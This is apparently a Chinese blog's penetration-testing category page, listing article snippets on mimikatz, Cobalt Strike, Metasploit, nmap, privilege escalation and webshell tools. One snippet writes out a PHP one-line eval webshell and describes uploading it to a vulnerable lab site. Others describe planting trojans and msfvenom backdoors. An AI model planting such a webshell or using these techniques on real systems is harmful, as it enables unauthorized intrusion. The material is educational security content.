
渗透测试
文章平均质量分 69
0x00dream
三十功名尘与土,八千里路云和月!
展开
-
Kali破解windows系统用户名密码工具mimikatz
mimikatz工具简介mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码。windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。实例演示(1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序bac原创 2021-07-20 17:54:38 · 5182 阅读 · 1 评论 -
信息收集之CDN绕过
一、什么是CDN?内容分发网络(Content Delivery Network,简称CDN)是建立并覆盖在承载网之上,由分布在不同区域的边缘节点服务器群组成的分布式网络。CDN应用广泛,支持多种行业、多种场景内容加速,例如:图片小文件、大文件下载、视音频点播、直播流媒体、全站加速、安全加速。CDN网络拓扑大概就是上面那个样子了,简单来说,就是针对同一站点服务,给不同地区的用户分配不同的CDN节点以供不同地区的用户访问速度有所提升。1.2、做渗透测试为何要绕过CDN?因为CDN 如果存在的话,渗透工原创 2021-07-18 20:03:57 · 320 阅读 · 0 评论 -
路径遍历(目录遍历)
一、简介路径遍历攻击也成为目录遍历,旨在,访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对路径来引用文件的变量,来访问存储在文件系统上的任意文件和目录,包括应用程序源代码...转载 2021-04-21 17:48:11 · 4105 阅读 · 0 评论 -
渗透测试类型(白盒测试、黑盒测试)和漏洞扫描器
一、渗透测试类型渗透测试分为两种基本类型:白盒测试和黑盒测试。白盒测试:也被称为白帽测试,是指渗透测试者在拥有客户组织所有知识的情况下所进行的测试;黑盒测试:模拟一个对客户组织一无所知的攻击者所进行的渗透攻击。所以很容易理解,黑盒测试要比白盒测试困难很多。1、白盒测试使用白盒测试,需要和客户组织一起工作,来识别出潜在的安全风险。白盒测试的最大好处是测试者将拥有所有的内部知识,并可以在不需要害怕被阻断的情况下任意地实施破坏。而白盒测试最大的问题在于无法有效地测试客户组织的应急响应程序, 也无法原创 2021-03-13 14:53:23 · 3889 阅读 · 0 评论 -
冰蝎
冰蝎什么是冰蝎?冰蝎的特点加密原理通信过程什么是冰蝎?“冰蝎”是一个动态二进制加密网站管理客户端。在实战中,第一代webshell管理工具"菜刀"的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。"冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v2.0.1,兼容性较之前的版本有较大提升。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等,功能非常强大冰蝎的特点流量加密原创 2021-03-04 22:30:21 · 3569 阅读 · 2 评论 -
渗透测试——权限提升
提权一、什么是提权二、怎样进行提权(提权的方式有哪些)1、系统漏洞提权(Linux、Windows)一、什么是提权提权就是通过各种办法和漏洞,提升自己在服务器中的权限,以便控制全局。windows:User >> Systemlinux: User >> Root二、怎样进行提权(提权的方式有哪些)1、系统漏洞提权(Linux、Windows)2、数据库提权3、系统配置错误提权4、权限继承类提权5、第三方软件/服务提权6、WebServer漏洞提权1、系统转载 2021-03-01 16:24:41 · 1954 阅读 · 0 评论 -
渗透测试神器CS(4.0)的使用
CSCS简介CS简介Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。...原创 2020-12-27 17:56:51 · 23105 阅读 · 3 评论 -
渗透测试之信息收集——nmap的使用
信息收集是进行渗透测试之前非常重要的环节,它直接影响你渗透测试进行的深度和广度,也是决定你渗透测试是否能成功的关键性因素。所以再在渗透测试之前信息收集必须做好。信息收集:服务器信息(端口、服务、真实IP)网站信息(服务器操作系统、中间件、数据库、编程语言、敏感目录与文件、旁站查询C段查询)域名信息(whois、备案信息、子域名收集)网站管理员信息(姓名、职务、生日、联系电话、邮件地址)子域名收集:goole hacking语法查询:site:域名第三方网站查询:http://dnsumpste原创 2020-12-25 10:37:51 · 549 阅读 · 2 评论 -
MSF之攻击web站点漏洞获取目标机器最高权限
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter方法一:通过web站点,使用无文件的方式攻击利用执行如何利用?这里介绍一个msf的新模块web_delivery当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。web_delivery的主要目的是快速和受害者原创 2020-12-22 15:17:35 · 2562 阅读 · 0 评论 -
MSF详解及常用命令之利用msf控制目标电脑
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马**序言:MSF简介Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。**1、模块介绍它是一个渗透测试框架(模块介绍)auxi原创 2020-12-21 21:21:03 · 2726 阅读 · 0 评论 -
钓鱼网站常见类型
这篇来和大家说说我们日常生活中很常见的一种黑客攻击方式,也是我们比较感兴趣的,那就是钓鱼网站1、鱼叉式钓鱼攻击一般的网络钓鱼电子邮件使用类似垃圾邮件的策略,群发给成千上万的人,发送收件人感兴趣的主题来诱使目标用户打开邮件并点击钓鱼链接。2、水坑钓鱼攻击水坑攻击是ATP攻击的一种是常用手段,黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站弱点,入侵这些防御措施相对薄弱的服务器并植入恶意程序,当用户访问了这些网站,就会遭受感染。所以希望不要盲目去点击网站上的一些链接,陌生站点不访问,陌原创 2020-11-08 15:53:17 · 2628 阅读 · 0 评论 -
利用蚁剑对具有upload漏洞的网站进行攻击
最近学习了文件上传漏洞upload,一句话木马的注入以及蚁剑的结合使用,直接黑入靶场网站后台,拿到它的后台根目录,进而实现增删改查的骚操作。一、首先通过phpstudy搭建一个upload靶场由于这个网闸后台使用php语言编写的,所以通过上传文件向此网站注入php一句话木马病毒。<?php @eval($_POST['hacker']); 取名为webshell,文件后缀当然是php ![在这里插入图片描述](https://img-blog.csdnimg.cn/202010300842原创 2020-10-30 09:22:39 · 1314 阅读 · 0 评论